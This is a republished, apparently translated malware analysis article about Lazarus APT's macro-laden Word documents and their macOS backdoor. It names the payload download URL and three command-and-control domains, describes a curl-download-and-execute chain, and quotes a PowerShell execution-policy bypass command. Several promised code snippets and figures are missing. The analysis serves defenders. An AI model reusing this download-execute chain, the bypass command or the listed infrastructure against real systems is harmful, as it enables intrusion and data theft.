Shulou(Shulou.com)05/31 Report--

How to deeply analyze the malicious word documents used by LAZARUS APT for MAC users. For this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more small partners who want to solve this problem find a simpler and easier way.

Just last month, Kaspersky Lab researchers discovered a malicious attack campaign targeting macOS and Windows users and named it "Lazarus APT." It is understood that this attack is mainly aimed at users in the financial field, and the most seriously affected are users of cryptocurrency trading platforms. Lazarus, aka Hidden Cobra, has been active since 2009. Do you remember Sony Japan experienced a serious cyber attack in 2014? Yeah, Lazarus did that, too.

We will focus on the attack logic Lazarus uses to attack macOS and Windows systems, as well as malicious Word documents.

In fact, using VBA macros to create malicious Microsoft Office documents is nothing new, especially Trojans targeting banking institutions. However, we rarely see malicious Word documents targeting macOS, which is why we need to learn more about Lazarus attack technical details that Kaspersky's security report does not mention.

Malicious Word document with macros enabled

Below is a sample of Lazarus malicious documents targeting users in South Korea:

Oddly enough, Kaspersky's researchers found that the attacks started around the end of 2018, but the creation date noted in the document was four years ago, namely November 3, 2014. As far as the content of the document is concerned, the document purports to have been provided by a company named "Han Seung" and its representative,"Jin Seok Kim."

We found several companies called "Han Seung" in search engines, but none of them had "Jin Seok Kim" as an employee. Therefore, we believe that either the company name in the malicious document is false, or the representative name is false, or it is all false.

We used oletools to disassemble the VBA code in the malicious document, from which we can see that the document first tests whether the malicious code can run on macOS, and if it can run, it will declare system functions and popen functions depending on the version of VBA.

If the target system is not macOS, the documentation defines 144 different data arrays containing ASCII codes that can be used to compose a complete PowerShell script.

The script snippet after refactoring is as follows:

When everything is ready, the code defines a subpath to AutoOpen() and tests again whether the target platform is macOS or Windows.

We can see the macOS version architecture of the target device. The code will call the Payload download function through the system function (implemented using the curl command, the download directory is/tmp). The URL address is as follows:

https//nzssdm.com/assets/mt.dat

The code uses the chmod command to give executable permissions to the Payload file and runs the Payload. Since the file was downloaded via curl, neither Gatekeeper nor XProtect can detect it.

The Windows version schema consists of a string containing the following PowerShell commands:

powershell-ExecutionPolicy Bypass -file spath

The spath is randomly named, and the file name is 13 random characters, but in this case.ps1 is added as the file suffix and saved in the temp directory of the target user.

macOS backdoor

mt.dat This Payload file is a Mach-O 64-bit executable file, and the data in the symbol table indicates that this is a custom backdoor. Some of these variables can be guessed from their names, such as CheckUSB and ReplyOtherShellCmd. However, functions that include the string "Troy" are less obvious. However, some students may know that "Troy" is a well-known malware campaign, mainly targeting Korean users.

From here, you can see that these commands are obviously sent from the C2 server, and the static analysis results also show that ReplyTroyInfo method will first detect the host name of the target device, then collect network information, and finally encrypt the collected data and extract it to the remote server.

In addition to this, attackers also attempted to bypass certain legacy antivirus mechanisms using string rule matching, for example.

After executing the malicious file, we discovered that the malware was attempting to communicate with three different C2 server addresses. Every 60 seconds, the malware executes the curl_easy_perform method to attempt to establish a connection to one of the hardcoded server addresses. If the connection fails, the process sleeps for 60 seconds and tries to establish a connection again with the next server.

The list of server addresses in the sample is as follows:

https://baseballcharlemagnelegardeur.com

https://www.tangowithcolette.com

https://towingoperations.com

After testing IP addresses with netcat, we found that all servers were active:

However, we were unable to run the malware directly, and every attempt to establish a connection to the server encountered a 406 error, indicating that there was a problem with the request format:

In addition, we also obtained an encrypted file from the C2 server. The following is the communication address of one of the malware:

https://www.tangowithcolette.com/pages/common.php

When downloading the file, we also found another reference address:

The "_Incapsule_Resource…" script contains a number of hexadecimal values:

After converting it to ASCII, we get an obfuscated JavaScript:

The script code is about 1400 lines long and includes URI component decoding, resource retrieval, cookie removal, and browser session modification.

About how to in-depth analysis of LAZARUS APT for MAC users to use malicious word document questions to share here, I hope the above content can be of some help to everyone, if you still have a lot of doubts not solved, you can pay attention to the industry information channel to learn more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.